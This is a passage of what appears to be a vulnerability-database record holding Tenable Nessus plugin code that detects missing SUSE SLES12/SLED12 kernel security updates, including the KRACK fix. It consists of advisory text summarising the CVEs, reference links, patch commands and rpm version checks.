attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057015\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057031\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057035\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057047\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057067\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057383\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057498\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057849\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058116\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058135\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058507\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058550\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1059051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1059465\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1059500\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1059863\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1060197\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1060229\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1060249\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1060400\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1060985\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061017\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061067\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061451\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061721\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061775\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061831\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1062279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1062520\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1062962\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063102\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063349\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063460\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063475\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063479\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063501\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063509\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063520\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063570\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063671\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1064064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1064206\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1064388\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1064436\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=963575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=964944\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966170\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966191\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966316\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966318\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969476\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969477\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969756\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971975\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=981309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000252/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11472/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12134/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12153/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12154/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13080/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-14051/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-14106/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-14489/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-15265/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-15649/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172847-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?353e456c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2017-1770=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2017-1770=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2017-1770=1\n\nSUSE Linux Enterprise Live Patching 12-SP3:zypper in -t patch\nSUSE-SLE-Live-Patching-12-SP3-2017-1770=1\n\nSUSE Linux Enterprise High Availability 12-SP3:zypper in -t patch\nSUSE-SLE-HA-12-SP3-2017-1770=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2017-1770=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-default-man-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-base-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-base-debuginfo-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-debuginfo-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-debugsource-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-devel-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-syms-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-devel-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-extra-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-syms-4.4.92-6.18.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:26:51", "description": "The SUSE Linux Enterprise 12 SP2 kernel was updated to 4.4.90 to\nreceive various security and bugfixes. The following security bugs\nwere fixed :\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel\n allowed guest OS users to cause a denial of service\n (assertion failure, and hypervisor hang or crash) via an\n out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n\n - CVE-2017-10810: Memory leak in the\n virtio_gpu_object_create function in\n drivers/gpu/drm/virtio/virtgpu_object.c in the Linux\n kernel allowed attackers to cause a denial of service\n (memory consumption) by triggering object-initialization\n failures (bnc#1047277).\n\n - CVE-2017-11472: The acpi_ns_terminate() function in\n drivers/acpi/acpica/nsutils.c in the Linux kernel did\n not flush the operand cache and causes a kernel stack\n dump, which allowed local users to obtain sensitive\n information from kernel memory and bypass the KASLR\n protection mechanism (in the kernel through 4.9) via a\n crafted ACPI table (bnc#1049580).\n\n - CVE-2017-11473: Buffer overflow in the\n mp_override_legacy_irq() function in\n arch/x86/kernel/acpi/boot.c in the Linux kernel allowed\n local users to gain privileges via a crafted ACPI table\n (bnc#1049603).\n\n - CVE-2017-12134: The xen_biovec_phys_mergeable function\n in drivers/xen/biomerge.c in Xen might allow local OS\n guest users to corrupt block device data streams and\n consequently obtain sensitive memory information, cause\n a denial of service, or gain host OS privileges by\n leveraging incorrect block IO merge-ability calculation\n (bnc#1051790 bnc#1053919).\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in\n net/wireless/nl80211.c in the Linux kernel This function\n did not check whether the required attributes are\n present in a Netlink request. This request can be issued\n by a user with the CAP_NET_ADMIN capability and may\n result in a NULL pointer dereference and system crash\n (bnc#1058410).\n\n - CVE-2017-12154: The prepare_vmcs02 function in\n arch/x86/kvm/vmx.c in the Linux kernel did not ensure\n that the 'CR8-load exiting' and 'CR8-store exiting' L0\n vmcs02 controls exist in cases where L1 omits the 'use\n TPR shadow' vmcs12 control, which allowed KVM L2 guest\n OS users to obtain read and write access to the hardware\n CR8 register (bnc#1058507).\n\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2)\n allowed reinstallation of the Group Temporal Key (GTK)\n during the group key handshake, allowing an attacker\n within radio range to replay frames from access points\n to clients (bnc#1063667).\n\n - CVE-2017-14051: An integer overflow in the\n qla2x00_sysfs_write_optrom_ctl function in\n drivers/scsi/qla2xxx/qla_attr.c in the Linux kernel\n allowed local users to cause a denial of service (memory\n corruption and system crash) by leveraging root access\n (bnc#1056588).\n\n - CVE-2017-14106: The tcp_disconnect function in\n net/ipv4/tcp.c in the Linux kernel allowed local users\n to cause a denial of service (__tcp_select_window\n divide-by-zero error and system crash) by triggering a\n disconnect within a certain tcp_recvmsg code path\n (bnc#1056982).\n\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n allowed local users to cause a denial of service (panic)\n by leveraging incorrect length validation (bnc#1059051).\n\n - CVE-2017-15649: net/packet/af_packet.c in the Linux\n kernel allowed local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that\n leads to a use-after-free, a different vulnerability\n than CVE-2017-6346 (bnc#1064388).\n\n - CVE-2017-7518: The Linux kernel was vulnerable to an\n incorrect debug exception(#DB) error. It could occur\n while emulating a syscall instruction and potentially\n lead to guest privilege escalation. (bsc#1045922).\n\n - CVE-2017-7541: The brcmf_cfg80211_mgmt_tx function in\n drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg8021\n 1.c in the Linux kernel allowed local users to cause a\n denial of service (buffer overflow and system crash) or\n possibly gain privileges via a crafted NL80211_CMD_FRAME\n Netlink packet (bnc#1049645).\n\n - CVE-2017-7542: The ip6_find_1stfragopt function in\n net/ipv6/output_core.c in the Linux kernel allowed local\n users to cause a denial of service (integer overflow and\n infinite loop) by leveraging the ability to open a raw\n socket (bnc#1049882).\n\n - CVE-2017-8831: The saa7164_bus_get function in\n drivers/media/pci/saa7164/saa7164-bus.c in the Linux\n kernel allowed local users to cause a denial of service\n (out-of-bounds array access) or possibly have\n unspecified other impact by changing a certain\n sequence-number value, aka a 'double fetch'\n vulnerability (bnc#1037994).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 35, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2017-10-30T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:2869-1) (KRACK)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14051", "CVE-2017-13080", "CVE-2017-14489", "CVE-2017-7518", "CVE-2017-15649", "CVE-2017-1000252", "CVE-2017-11472", "CVE-2017-8831", "CVE-2017-10810", "CVE-2017-14106", "CVE-2017-11473", "CVE-2017-7541", "CVE-2017-12134", "CVE-2017-12153", "CVE-2017-6346", "CVE-2017-7542", "CVE-2017-12154"], "modified": "2017-10-30T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default"], "id": "SUSE_SU-2017-2869-1.NASL", "href": "https://www.tenable.com/plugins/nessus/104253", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2869-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104253);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000252\", \"CVE-2017-10810\", \"CVE-2017-11472\", \"CVE-2017-11473\", \"CVE-2017-12134\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-13080\", \"CVE-2017-14051\", \"CVE-2017-14106\", \"CVE-2017-14489\", \"CVE-2017-15649\", \"CVE-2017-6346\", \"CVE-2017-7518\", \"CVE-2017-7541\", \"CVE-2017-7542\", \"CVE-2017-8831\");\n script_xref(name:\"IAVA\", value:\"2017-A-0310\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:2869-1) (KRACK)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 SP2 kernel was updated to 4.4.90 to\nreceive various security and bugfixes. The following security bugs\nwere fixed :\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel\n allowed guest OS users to cause a denial of service\n (assertion failure, and hypervisor hang or crash) via an\n out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n\n - CVE-2017-10810: Memory leak in the\n virtio_gpu_object_create function in\n drivers/gpu/drm/virtio/virtgpu_object.c in the Linux\n kernel allowed attackers to cause a denial of service\n (memory consumption) by triggering object-initialization\n failures (bnc#1047277).\n\n - CVE-2017-11472: The acpi_ns_terminate() function in\n drivers/acpi/acpica/nsutils.c in the Linux kernel did\n not flush the operand cache and causes a kernel stack\n dump, which allowed local users to obtain sensitive\n information from kernel memory and bypass the KASLR\n protection mechanism (in the kernel through 4.9) via a\n crafted ACPI table (bnc#1049580).\n\n - CVE-2017-11473: Buffer overflow in the\n mp_override_legacy_irq() function in\n arch/x86/kernel/acpi/boot.c in the Linux kernel allowed\n local users to gain privileges via a crafted ACPI table\n (bnc#1049603).\n\n - CVE-2017-12134: The xen_biovec_phys_mergeable function\n in drivers/xen/biomerge.c in Xen might allow local OS\n guest users to corrupt block device data streams and\n consequently obtain sensitive memory information, cause\n a denial of service, or gain host OS privileges by\n leveraging incorrect block IO merge-ability calculation\n (bnc#1051790 bnc#1053919).\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in\n net/wireless/nl80211.c in the Linux kernel This function\n did not check whether the required attributes are\n present in a Netlink request. This request can be issued\n by a user with the CAP_NET_ADMIN capability and may\n result in a NULL pointer dereference and system crash\n (bnc#1058410).\n\n - CVE-2017-12154: The prepare_vmcs02 function in\n arch/x86/kvm/vmx.c in the Linux kernel did not ensure\n that the 'CR8-load exiting' and 'CR8-store exiting' L0\n vmcs02 controls exist in cases where L1 omits the 'use\n TPR shadow' vmcs12 control, which allowed KVM L2 guest\n OS users to obtain read and write access to the hardware\n CR8 register (bnc#1058507).\n\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2)\n allowed reinstallation of the Group Temporal Key (GTK)\n during the group key handshake, allowing an attacker\n within radio range to replay frames from access points\n to clients (bnc#1063667).\n\n - CVE-2017-14051: An integer overflow in the\n qla2x00_sysfs_write_optrom_ctl function in\n drivers/scsi/qla2xxx/qla_attr.c in the Linux kernel\n allowed local users to cause a denial of service (memory\n corruption and system crash) by leveraging root access\n (bnc#1056588).\n\n - CVE-2017-14106: The tcp_disconnect function in\n net/ipv4/tcp.c in the Linux kernel allowed local users\n to cause a denial of service (__tcp_select_window\n divide-by-zero error and system crash) by triggering a\n disconnect within a certain tcp_recvmsg code path\n (bnc#1056982).\n\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n allowed local users to cause a denial of service (panic)\n by leveraging incorrect length validation (bnc#1059051).\n\n - CVE-2017-15649: net/packet/af_packet.c in the Linux\n kernel allowed local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that\n leads to a use-after-free, a different vulnerability\n than CVE-2017-6346 (bnc#1064388).\n\n - CVE-2017-7518: The Linux kernel was vulnerable to an\n incorrect debug exception(#DB) error. It could occur\n while emulating a syscall instruction and potentially\n lead to guest privilege escalation. (bsc#1045922).\n\n - CVE-2017-7541: The brcmf_cfg80211_mgmt_tx function in\n drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg8021\n 1.c in the Linux kernel allowed local users to cause a\n denial of service (buffer overflow and system crash) or\n possibly gain privileges via a crafted NL80211_CMD_FRAME\n Netlink packet (bnc#1049645).\n\n - CVE-2017-7542: The ip6_find_1stfragopt function in\n net/ipv6/output_core.c in the Linux kernel allowed local\n users to cause a denial of service (integer overflow and\n infinite loop) by leveraging the ability to open a raw\n socket (bnc#1049882).\n\n - CVE-2017-8831: The saa7164_bus_get function in\n drivers/media/pci/saa7164/saa7164-bus.c in the Linux\n kernel allowed local users to cause a denial of service\n (out-of-bounds array access) or possibly have\n unspecified other impact by changing a certain\n sequence-number value, aka a 'double fetch'\n vulnerability (bnc#1037994).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1006180\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011913\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012829\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1013887\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1019151\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020645\"\n );\n script_set_attribute(\n 